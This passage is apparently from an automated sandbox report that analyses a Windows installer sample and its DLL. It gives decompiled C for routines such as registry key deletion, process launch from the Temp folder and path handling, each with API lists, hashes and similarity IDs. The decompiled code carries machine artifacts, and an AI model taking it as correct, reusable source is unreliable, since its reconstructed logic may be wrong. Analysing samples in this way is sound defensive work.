                                          					}
                                          					RegCloseKey(_v8);
                                          					_t27 = E00405C49(2);
                                          					if(_t27 == 0) {
                                          						__eflags =  *0x42ec10; // 0x0
                                          						if(__eflags != 0) {
                                          							goto L8;
                                          						}
                                          						_t28 = RegDeleteKeyA(_a4, _a8);
                                          						__eflags = _t28;
                                          						if(_t28 != 0) {
                                          							goto L8;
                                          						}
                                          						return _t28;
                                          					}
                                          					return  *_t27(_a4, _a8,  *0x42ec10, 0);
                                          				}
                                          				return _t18;
                                          			}











                                          APIs
                                          • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000000,?), ref: 00402A49
                                          • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A85
                                          • RegCloseKey.ADVAPI32(?), ref: 00402A8E
                                          • RegCloseKey.ADVAPI32(?), ref: 00402AB3
                                          • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AD1
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: Close$DeleteEnumOpen
                                          • String ID:
                                          • API String ID: 1912718029-0
                                          • Opcode ID: 67ce441666b2dfd9254d3678beef5a316d57c22f87aba3efa5689cf0a4389e91
                                          • Instruction ID: 9b693693afe27744eb74945a5ab88af436457a169b5d028682666f5dd4735d18
                                          • Opcode Fuzzy Hash: 67ce441666b2dfd9254d3678beef5a316d57c22f87aba3efa5689cf0a4389e91
                                          • Instruction Fuzzy Hash: 07119A31600109FFDF21AF91DE49DAB3B2DEB40394B00453AFA01B10A0DBB59E41EF69
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00401CC1(int __edx) {
                                          				void* _t17;
                                          				struct HINSTANCE__* _t21;
                                          				struct HWND__* _t25;
                                          				void* _t27;
                                          
                                          				_t25 = GetDlgItem( *(_t27 - 0x34), __edx);
                                          				GetClientRect(_t25, _t27 - 0x40);
                                          				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E004029E8(_t21), _t21,  *(_t27 - 0x38) *  *(_t27 - 0x1c),  *(_t27 - 0x34) *  *(_t27 - 0x1c), 0x10));
                                          				if(_t17 != _t21) {
                                          					DeleteObject(_t17);
                                          				}
                                          				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t27 - 4));
                                          				return 0;
                                          			}








                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                          • String ID:
                                          • API String ID: 1849352358-0
                                          • Opcode ID: c4a47ce9881a1f69b5484b78f7b8908d95eb4cef416732969b071724251a1cb6
                                          • Instruction ID: 5b52a60f850666e7e12d56efb71538ab26ca797e9f055acb3b10a0d9f88dae52
                                          • Opcode Fuzzy Hash: c4a47ce9881a1f69b5484b78f7b8908d95eb4cef416732969b071724251a1cb6
                                          • Instruction Fuzzy Hash: 26F0FFB2A04105BFD700EBA4EE89DAF77BDEB44341B104476F601F6190C7749D018B29
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RegEnumKeyExW.ADVAPI32(00000000,?,?,00000027,00000000,00000000,00000000,00000000), ref: 1000324E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.461522523.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000004.00000002.461509541.0000000010000000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.461540942.000000001001A000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.461551096.000000001001F000.00000040.00020000.sdmp
                                          • Associated: 00000004.00000002.461561278.0000000010020000.00000080.00020000.sdmp
                                          • Associated: 00000004.00000002.461594815.0000000010021000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: Enum
                                          • String ID: '$(%p)
                                          • API String ID: 2928410991-2641672736
                                          • Opcode ID: f1dbfbd6fa98d78f8e244c2f58914a71cb0c7876369f66b7624f4cbfca899760
                                          • Instruction ID: b6d1d7657e7a7e3edf9a50d0917a8c82399f877b3b2979ff95ef16c476ba8dd8
                                          • Opcode Fuzzy Hash: f1dbfbd6fa98d78f8e244c2f58914a71cb0c7876369f66b7624f4cbfca899760
                                          • Instruction Fuzzy Hash: E24129B4D00209EFEB05CF98C885B9EB7F5FB48354F20C569E815AB285C774AA80DF91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RegEnumKeyExW.ADVAPI32(00000000,?,?,00000027,00000000,00000000,00000000,00000000), ref: 10002D07
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.461522523.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000004.00000002.461509541.0000000010000000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.461540942.000000001001A000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.461551096.000000001001F000.00000040.00020000.sdmp
                                          • Associated: 00000004.00000002.461561278.0000000010020000.00000080.00020000.sdmp
                                          • Associated: 00000004.00000002.461594815.0000000010021000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: Enum
                                          • String ID: '$(%p)
                                          • API String ID: 2928410991-2641672736
                                          • Opcode ID: d1b3ddf9fb01f5f87afefb093d8fc0f214f17ed02c1910b4308fe52a8263cf6a
                                          • Instruction ID: c91547dca7855072b4129fabf150c041ae011a61f3c8998262423de82a0222ae
                                          • Opcode Fuzzy Hash: d1b3ddf9fb01f5f87afefb093d8fc0f214f17ed02c1910b4308fe52a8263cf6a
                                          • Instruction Fuzzy Hash: 323108B4900209EFEB14CF84C888BEEB7F5FB44345F20855AE9056B285D374AE84DB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 51%
                                          			E004044B6(int _a4, intOrPtr _a8, unsigned int _a12) {
                                          				char _v36;
                                          				char _v68;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				void* _t26;
                                          				void* _t34;
                                          				signed int _t36;
                                          				signed int _t39;
                                          				unsigned int _t46;
                                          
                                          				_t46 = _a12;
                                          				_push(0x14);
                                          				_pop(0);
                                          				_t34 = 0xffffffdc;
                                          				if(_t46 < 0x100000) {
                                          					_push(0xa);
                                          					_pop(0);
                                          					_t34 = 0xffffffdd;
                                          				}
                                          				if(_t46 < 0x400) {
                                          					_t34 = 0xffffffde;
                                          				}
                                          				if(_t46 < 0xffff3333) {
                                          					_t39 = 0x14;
                                          					asm("cdq");
                                          					_t46 = _t46 + 1 / _t39;
                                          				}
                                          				_push(E0040594D(_t34, 0, _t46,  &_v36, 0xffffffdf));
                                          				_push(E0040594D(_t34, 0, _t46,  &_v68, _t34));
                                          				_t21 = _t46 & 0x00ffffff;
                                          				_t36 = 0xa;
                                          				_push(((_t46 & 0x00ffffff) + _t21 * 4 + (_t46 & 0x00ffffff) + _t21 * 4 >> 0) % _t36);
                                          				_push(_t46 >> 0);
                                          				_t26 = E0040594D(_t34, 0, 0x429fd8, 0x429fd8, _a8);
                                          				wsprintfA(_t26 + lstrlenA(0x429fd8), "%u.%u%s%s");
                                          				return SetDlgItemTextA( *0x42e338, _a4, 0x429fd8);
                                          			}














                                          APIs
                                          • lstrlenA.KERNEL32(00429FD8,00429FD8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004043D6,000000DF,0000040F,00000400,00000000), ref: 00404544
                                          • wsprintfA.USER32 ref: 0040454C
                                          • SetDlgItemTextA.USER32(?,00429FD8), ref: 0040455F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: ItemTextlstrlenwsprintf
                                          • String ID: %u.%u%s%s
                                          • API String ID: 3540041739-3551169577
                                          • Opcode ID: 9ef419584118109bfe096c59dc58bdf2b1081d5b2e965ff29ec39ca84245abfe
                                          • Instruction ID: e44b7de75f1afc080fd53ae6a7962c6c3308310fc923ee70d3b0388825d49f6b
                                          • Opcode Fuzzy Hash: 9ef419584118109bfe096c59dc58bdf2b1081d5b2e965ff29ec39ca84245abfe
                                          • Instruction Fuzzy Hash: CE11E2B3A0022467DB10A66A9C05EAF36599BC2334F14023BFA29F61D1E9388C1186A8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 51%
                                          			E00401BAD() {
                                          				signed int _t28;
                                          				CHAR* _t31;
                                          				long _t32;
                                          				int _t37;
                                          				signed int _t38;
                                          				int _t42;
                                          				int _t48;
                                          				struct HWND__* _t52;
                                          				void* _t55;
                                          
                                          				 *(_t55 - 0x34) = E004029CB(3);
                                          				 *(_t55 + 8) = E004029CB(4);
                                          				if(( *(_t55 - 0x10) & 0x00000001) != 0) {
                                          					 *((intOrPtr*)(__ebp - 0x34)) = E004029E8(0x33);
                                          				}
                                          				__eflags =  *(_t55 - 0x10) & 0x00000002;
                                          				if(( *(_t55 - 0x10) & 0x00000002) != 0) {
                                          					 *(_t55 + 8) = E004029E8(0x44);
                                          				}
                                          				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - 0x21;
                                          				_push(1);
                                          				if(__eflags != 0) {
                                          					_t50 = E004029E8();
                                          					_t28 = E004029E8();
                                          					asm("sbb ecx, ecx");
                                          					asm("sbb eax, eax");
                                          					_t31 =  ~( *_t27) & _t50;
                                          					__eflags = _t31;
                                          					_t32 = FindWindowExA( *(_t55 - 0x34),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
                                          					goto L10;
                                          				} else {
                                          					_t52 = E004029CB();
                                          					_t37 = E004029CB();
                                          					_t48 =  *(_t55 - 0x10) >> 2;
                                          					if(__eflags == 0) {
                                          						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8));
                                          						L10:
                                          						 *(_t55 - 8) = _t32;
                                          					} else {
                                          						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8), _t42, _t48, _t55 - 8);
                                          						asm("sbb eax, eax");
                                          						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
                                          					}
                                          				}
                                          				__eflags =  *((intOrPtr*)(_t55 - 0x24)) - _t42;
                                          				if( *((intOrPtr*)(_t55 - 0x24)) >= _t42) {
                                          					_push( *(_t55 - 8));
                                          					E00405889();
                                          				}
                                          				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t55 - 4));
                                          				return 0;
                                          			}













                                          APIs
                                          • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C0D
                                          • SendMessageA.USER32 ref: 00401C25
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: MessageSend$Timeout
                                          • String ID: !
                                          • API String ID: 1777923405-2657877971
                                          • Opcode ID: 672c969f6ffa347aa3c7b0db73338ddc2672c41c0f2d80c96ed6a2b1a5ff1745
                                          • Instruction ID: 5ea9a142a0052d8e356a619bc15d353e54371354b2f8ef601c25db15878fdf82
                                          • Opcode Fuzzy Hash: 672c969f6ffa347aa3c7b0db73338ddc2672c41c0f2d80c96ed6a2b1a5ff1745
                                          • Instruction Fuzzy Hash: 0A2183B1A44104AEEF01AFB5CD5BAAD7A75EF41704F14047AF501B61D1D6B88940D728
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • __woutput_l.LIBCMT ref: 1000DE1C
                                            • Part of subcall function 1000EEDB: __getptd_noexit.LIBCMT ref: 1000EEDB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.461522523.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000004.00000002.461509541.0000000010000000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.461540942.000000001001A000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.461551096.000000001001F000.00000040.00020000.sdmp
                                          • Associated: 00000004.00000002.461561278.0000000010020000.00000080.00020000.sdmp
                                          • Associated: 00000004.00000002.461594815.0000000010021000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: __getptd_noexit__woutput_l
                                          • String ID: B
                                          • API String ID: 3669879410-1255198513
                                          • Opcode ID: 1dbaa59afa0ca20ca81a1cceb12b1bca4685f0abbbbc00b6d921f113fda761c5
                                          • Instruction ID: f5970ea7841dbd41225c887377fceb4ccc1b2774bd36d29a24c4a66a397bf882
                                          • Opcode Fuzzy Hash: 1dbaa59afa0ca20ca81a1cceb12b1bca4685f0abbbbc00b6d921f113fda761c5
                                          • Instruction Fuzzy Hash: 0511607190425D9EEF00EFA8DC819EEB7B8FF08394F10412BE815A6285EB3599058B71
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetProcessHeap.KERNEL32(00000008,00000014), ref: 10002AB5
                                          • HeapAlloc.KERNEL32(00000000), ref: 10002ABC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.461522523.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000004.00000002.461509541.0000000010000000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.461540942.000000001001A000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.461551096.000000001001F000.00000040.00020000.sdmp
                                          • Associated: 00000004.00000002.461561278.0000000010020000.00000080.00020000.sdmp
                                          • Associated: 00000004.00000002.461594815.0000000010021000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: Heap$AllocProcess
                                          • String ID: returning %p
                                          • API String ID: 1617791916-1981732286
                                          • Opcode ID: 68b521b97bfb92d8346331d6d3625f8042e18750b929dbe9ece2fedea7593cdc
                                          • Instruction ID: 5cf1d514b477252b5a9a27c918d9b124f231ee9ce3ae76c2b0636738c4a9c396
                                          • Opcode Fuzzy Hash: 68b521b97bfb92d8346331d6d3625f8042e18750b929dbe9ece2fedea7593cdc
                                          • Instruction Fuzzy Hash: EF1139B8A00248EFEB01CF94C944B99B7F0EB49354F208198ED095B356D776DE84DB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E0040518B(CHAR* _a4) {
                                          				struct _PROCESS_INFORMATION _v20;
                                          				int _t7;
                                          
                                          				0x42bfe0->cb = 0x44;
                                          				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x42bfe0,  &_v20);
                                          				if(_t7 != 0) {
                                          					CloseHandle(_v20.hThread);
                                          					return _v20.hProcess;
                                          				}
                                          				return _t7;
                                          			}






                                          APIs
                                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,0042BFE0,Error launching installer), ref: 004051B0
                                          • CloseHandle.KERNEL32(?), ref: 004051BD
                                          Strings
                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 0040518B
                                          • Error launching installer, xrefs: 0040519E
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: CloseCreateHandleProcess
                                          • String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer
                                          • API String ID: 3712363035-3894416041
                                          • Opcode ID: b38c976d41fbf5581cd3581743b2c772e0e0d761a2224e88a4e7645e11274b50
                                          • Instruction ID: 2907f660324095bb22c49bf820cefbd87778b5f2e5ee3a47b55f65b03477d649
                                          • Opcode Fuzzy Hash: b38c976d41fbf5581cd3581743b2c772e0e0d761a2224e88a4e7645e11274b50
                                          • Instruction Fuzzy Hash: D6E0ECB4A14209ABEB10DF74ED0AE6F7BBCFB00344B408522AD11E2250D779E410CAB9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RegCloseKey.ADVAPI32(?), ref: 10002B5B
                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 10002B67
                                          • HeapFree.KERNEL32(00000000), ref: 10002B6E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.461522523.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000004.00000002.461509541.0000000010000000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.461540942.000000001001A000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.461551096.000000001001F000.00000040.00020000.sdmp
                                          • Associated: 00000004.00000002.461561278.0000000010020000.00000080.00020000.sdmp
                                          • Associated: 00000004.00000002.461594815.0000000010021000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: Heap$CloseFreeProcess
                                          • String ID: destroying %p
                                          • API String ID: 1203615452-3738993722
                                          • Opcode ID: b87447611b39c4c8c13bb7cd5be3be263e4eb9586296920040f0800865945d4f
                                          • Instruction ID: 8d935494a777c0bb9309948e0976d3e62e2b330e91ef4393346fd43074a5256e
                                          • Opcode Fuzzy Hash: b87447611b39c4c8c13bb7cd5be3be263e4eb9586296920040f0800865945d4f
                                          • Instruction Fuzzy Hash: 9CE012BD100218ABE700DF94DD89FE93BADEB4D745F048004FA0D8B211C675E9808BB2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E0040541E(CHAR* _a4) {
                                          				CHAR* _t7;
                                          
                                          				_t7 = _a4;
                                          				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
                                          					lstrcatA(_t7, 0x40900c);
                                          				}
                                          				return _t7;
                                          			}





                                          APIs
                                          • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030CD,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405424
                                          • CharPrevA.USER32(?,00000000), ref: 0040542D
                                          • lstrcatA.KERNEL32(?,0040900C), ref: 0040543E
                                          Strings
                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 0040541E
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: CharPrevlstrcatlstrlen
                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                          • API String ID: 2659869361-4017390910
                                          • Opcode ID: 103a7f091eca4e356757d037532255daa0bd9c7b09fb9152348cdcff170487b5
                                          • Instruction ID: 104188ff39e6d10e0057bf8a610b6096ce4ad2879363e85d627e75dd9bc73d26
                                          • Opcode Fuzzy Hash: 103a7f091eca4e356757d037532255daa0bd9c7b09fb9152348cdcff170487b5
                                          • Instruction Fuzzy Hash: 04D0A9A2609A70BEE20227159C05ECB2E08CF02729B048422F140B22D2C33C4E82CFFE
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 10010BE6
                                          • __isleadbyte_l.LIBCMT ref: 10010C14
                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 10010C42
                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 10010C78
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.461522523.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000004.00000002.461509541.0000000010000000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.461540942.000000001001A000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.461551096.000000001001F000.00000040.00020000.sdmp
                                          • Associated: 00000004.00000002.461561278.0000000010020000.00000080.00020000.sdmp
                                          • Associated: 00000004.00000002.461594815.0000000010021000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                          • String ID:
                                          • API String ID: 3058430110-0
                                          • Opcode ID: a0fb378d693a50c4f1055ba6821a6901ac77a713fb28cb4761a7bace13ca4233
                                          • Instruction ID: a34ff9cdbd34352c44a27f0295f7af9ddf137694dfad050ba72e28238b107bbf
                                          • Opcode Fuzzy Hash: a0fb378d693a50c4f1055ba6821a6901ac77a713fb28cb4761a7bace13ca4233
                                          • Instruction Fuzzy Hash: D631A131704286EFDB11CF65CC84BAA7BE6FF41354F124529F8949B191E7B0E890DB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 85%
                                          			E00401EC5(char __ebx, char* __edi, char* __esi) {
                                          				char* _t18;
                                          				int _t19;
                                          				void* _t30;
                                          
                                          				_t18 = E004029E8(0xffffffee);
                                          				 *(_t30 - 0x2c) = _t18;
                                          				_t19 = GetFileVersionInfoSizeA(_t18, _t30 - 0x30);
                                          				 *__esi = __ebx;
                                          				 *(_t30 - 8) = _t19;
                                          				 *__edi = __ebx;
                                          				 *((intOrPtr*)(_t30 - 4)) = 1;
                                          				if(_t19 != __ebx) {
                                          					__eax = GlobalAlloc(0x40, __eax);
                                          					 *(__ebp + 8) = __eax;
                                          					if(__eax != __ebx) {
                                          						if(__eax != 0) {
                                          							__ebp - 0x44 = __ebp - 0x34;
                                          							if(VerQueryValueA( *(__ebp + 8), 0x40900c, __ebp - 0x34, __ebp - 0x44) != 0) {
                                          								 *(__ebp - 0x34) = E00405889(__esi,  *((intOrPtr*)( *(__ebp - 0x34) + 8)));
                                          								 *(__ebp - 0x34) = E00405889(__edi,  *((intOrPtr*)( *(__ebp - 0x34) + 0xc)));
                                          								 *((intOrPtr*)(__ebp - 4)) = __ebx;
                                          							}
                                          						}
                                          						_push( *(__ebp + 8));
                                          						GlobalFree();
                                          					}
                                          				}
                                          				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t30 - 4));
                                          				return 0;
                                          			}







                                          APIs
                                          • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401ED4
                                          • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401EF2
                                          • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F0B
                                          • VerQueryValueA.VERSION(?,0040900C,?,?,?,?,?,00000000), ref: 00401F24
                                            • Part of subcall function 00405889: wsprintfA.USER32 ref: 00405896
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                          • String ID:
                                          • API String ID: 1404258612-0
                                          • Opcode ID: 96c576a8d7c40e70efe5b4beeaa819c74075c8ca6966c6621d7a9c446a88aaa4
                                          • Instruction ID: 5df6cf6993c09150fb4e954c2a2c9de352bdee8941cce83e0996c7e852039ca5
                                          • Opcode Fuzzy Hash: 96c576a8d7c40e70efe5b4beeaa819c74075c8ca6966c6621d7a9c446a88aaa4
                                          • Instruction Fuzzy Hash: 56111C72900108BEDB01EFA5DD45DAEBBB9EF04344B20807AF501F61E1D7789A54DB28
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.461522523.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000004.00000002.461509541.0000000010000000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.461540942.000000001001A000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.461551096.000000001001F000.00000040.00020000.sdmp
                                          • Associated: 00000004.00000002.461561278.0000000010020000.00000080.00020000.sdmp
                                          • Associated: 00000004.00000002.461594815.0000000010021000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                          • String ID:
                                          • API String ID: 3016257755-0
                                          • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                          • Instruction ID: 076e675045b4b51a1cbf387ffc5062350a0e207931462626bf86d1546e424296
                                          • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                          • Instruction Fuzzy Hash: 42013D7A40014EFBCF129E84DC418ED3F66FB1A291B588415FE185D031D337D9B2AB81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E004054B2(char _a4) {
                                          				CHAR* _t3;
                                          				char* _t5;
                                          				CHAR* _t7;
                                          				CHAR* _t8;
                                          				void* _t10;
                                          
                                          				_t1 =  &_a4; // 0x405264
                                          				_t8 =  *_t1;
                                          				_t7 = CharNextA(_t8);
                                          				_t3 = CharNextA(_t7);
                                          				if( *_t8 == 0 ||  *_t7 != 0x5c3a) {
                                          					if( *_t8 != 0x5c5c) {
                                          						L8:
                                          						return 0;
                                          					}
                                          					_t10 = 2;
                                          					while(1) {
                                          						_t10 = _t10 - 1;
                                          						_t5 = E00405449(_t3, 0x5c);
                                          						if( *_t5 == 0) {
                                          							goto L8;
                                          						}
                                          						_t3 = _t5 + 1;
                                          						if(_t10 != 0) {
                                          							continue;
                                          						}
                                          						return _t3;
                                          					}
                                          					goto L8;
                                          				} else {
                                          					return CharNextA(_t3);
                                          				}
                                          			}









                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp
